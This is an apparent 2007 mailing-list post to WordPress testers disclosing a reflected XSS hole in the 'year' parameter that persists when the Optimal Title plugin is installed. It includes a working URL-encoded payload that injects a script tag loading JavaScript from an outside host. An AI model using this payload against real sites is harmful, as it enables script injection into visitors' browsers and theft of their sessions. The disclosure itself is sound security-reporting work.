[wp-testers] XSS-Security hole and Optimal Title
Vladimir Simovic
vladimir.simovic at gmail.com
Tue Apr 3 18:24:51 GMT 2007
Hi,
few days ago someone told me that lot of wordpress blogs are
vulnerable aginst xss injections. And he shows me a demo:
<www.your-domain.tld/index.php?year=%22%3E%3C/title%3E%3Cscript%20src=http://h4k.in/j.js%3E%3C/script%3E>
this is working in WP 2.0.9 and 2.1.2. I tested ist in few Weblogs.
The new Updates in 2.0.10 and 2.1.3 are fixing this BUT not if you are
using the Plugin Optimal Title
(http://elasticdog.com/2004/09/optimal-title/).
The security hole is then still there and in WP 2.0.10 and 2.1.12. I
tested it also in few Weblogs.
I don't know how serious this problem is because im not a security
expert ... and also not a native speaker in english language :-) but
this another story.
Greetings
--
Vladimir Simovic
Website: www.vlad-design.de | Weblog: www.perun.net
More information about the wp-testers
mailing list